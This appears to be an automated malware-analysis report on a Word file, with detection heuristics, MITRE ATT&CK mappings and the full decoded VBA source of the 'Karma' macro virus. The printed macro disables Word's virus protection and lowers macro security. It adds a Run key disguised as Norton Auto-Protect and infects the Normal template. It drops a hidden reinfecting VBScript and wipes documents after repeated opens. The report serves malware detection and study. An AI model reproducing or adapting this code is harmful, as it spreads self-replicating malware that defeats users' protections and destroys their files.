MALICIOUS
296
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1105 Ingress Tool Transfer
The VBA macro contains a Document_Open subroutine that attempts to establish persistence by writing a VBScript named 'Backup.vbs' to C:\Windows\ and creating a Run key entry for it. It also writes a file named 'Karma.drv' to C:\Windows\, likely as part of its payload delivery mechanism. The script explicitly uses WScript.Shell and CreateObject, indicating its intent to execute further malicious actions.
Heuristics 7
-
ClamAV: Win.Trojan.Karma-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Karma-2
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Print #1, "Dim Shortcut, Fave" Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")" Print #1, "Set Backup = WScript.CreateObject(""Word.Application"")" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Print #1, "Dim Shortcut, Fave" Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")" Print #1, "Set Backup = WScript.CreateObject(""Word.Application"")" -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
On Error Resume Next sFileName = Environ("Windir") If Right(sFileName, 1) <> "\" Then -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4166 bytes |
SHA-256: fbb30f7d3239a59ccbbd741dd72feb38584bbe7ba8a1eacac74302310aafe60d |
|||
|
Detection
ClamAV:
Doc.Trojan.Karma-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
' The Karma Virus v1.00 with VBS Backup/Payload
' By WalruS 09/00
If ActiveDocument.Name = "Document1" Then Exit Sub
Set Nor = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set Doc = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Options
.VirusProtection = False
.ConfirmConversions = False
.SaveNormalPrompt = False
End With
Application.DisplayStatusBar = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Norton Auto-Protect") = "C:\Windows\Backup.vbs"
Open "C:\Windows\Karma.drv" For Output As #1
Print #1, VBProject.VBComponents(1).CodeModule.Lines(1, 85)
Close #1
SetAttr ("C:\Windows\Karma.drv"), 6
Nor.DeleteLines 1, Nor.CountOfLines: Nor.AddFromFile ("C:\Windows\Karma.drv")
Doc.DeleteLines 1, Doc.CountOfLines: Doc.AddFromFile ("C:\Windows\Karma.drv")
Open "C:\Windows\Backup.vbs" For Output As #1
Print #1, "' Backup.vbs for Karma by The WalruS"
Print #1, "On Error Resume Next"
Print #1, "Dim WSHShell"
Print #1, "Dim Shortcut, Fave"
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
Print #1, "Set Backup = WScript.CreateObject(""Word.Application"")"
Print #1, "Backup.Options.VirusProtection = False"
Print #1, "Backup.Options.SaveNormalPrompt = False"
Print #1, "For x = 1 To Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
Print #1, "Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1"
Print #1, "Next"
Print #1, "Backup.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (""C:\Windows\Karma.drv"")"
Print #1, "Backup.Application.Quit"
Print #1, "Fave = (""C:\Windows\Favorites"")"
Print #1, "Set Shortcut = WSHShell.CreateShortcut(Fave & ""\The WalruS.url"")"
Print #1, "Shortcut.TargetPath = WSHShell.ExpandEnvironmentStrings(""www.WalruS.8k.com"")"
Print #1, "Shortcut.Save"
Print #1, "WSHShell.RegWrite ""HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner"", ""The WalruS"""
Print #1, "If Minute(Now) = 30 Then"
Print #1, "WSHShell.RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose"", ""1"""
Print #1, "MsgBox ""Microsoft Windows Shutdown Error"", vbExclamation, ""Bad Karma"""
Print #1, "Else"
Print #1, "WSHShell.RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose"", ""WalruS"""
Print #1, "End If"
Close #1
SetAttr ("C:\Windows\Backup.vbs"), 6
End Sub
Private Sub Document_Close()
On Error Resume Next
sFileName = Environ("Windir")
If Right(sFileName, 1) <> "\" Then
sFileName = sFileName & "\"
End If
sFileName = sFileName & "WIN.INI"
sCounter = System.PrivateProfileString(sFileName, ActiveDocument.FullName, "Counter")
sCounter = Val(sCounter) + 1
System.PrivateProfileString(sFileName, ActiveDocument.FullName, "Counter") = sCounter
If Val(sCounter) > "250" Then
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Set myRange = ActiveDocument.Paragraphs(1).Range
With myRange.Font
.Bold = True
.Name = "Space Woozies"
.Size = 100
End With
Selection.TypeText "This Document has expired due to Bad Karma"
End If
If ActiveDocument.Saved = False Then ActiveDocument.Save
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.